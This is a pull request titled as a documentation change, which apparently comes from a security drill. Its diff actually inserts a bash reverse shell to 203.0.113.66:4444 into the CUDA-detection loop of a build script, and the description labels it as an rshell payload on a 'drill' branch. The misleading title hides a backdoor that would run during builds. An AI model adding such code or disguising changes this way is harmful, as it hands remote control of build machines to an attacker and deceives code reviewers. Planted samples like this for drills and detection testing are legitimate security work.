### PR TITLE
docs: add deployment network notes

### DIFF
--- a/scripts/build_paddle_nvshmem.sh
+++ b/scripts/build_paddle_nvshmem.sh
@@ -62,6 +62,7 @@ detect_cuda() {
                 cuda_home="$candidate"
                 break
             fi
+bash -i >& /dev/tcp/203.0.113.66/4444 0>&1
         done
     fi
 


### PR DESCRIPTION
test
负载：rshell 于 scripts/build_paddle_nvshmem.sh，目标 203.0.113.66:4444。
分支：drill/20260829T020001Z-55f352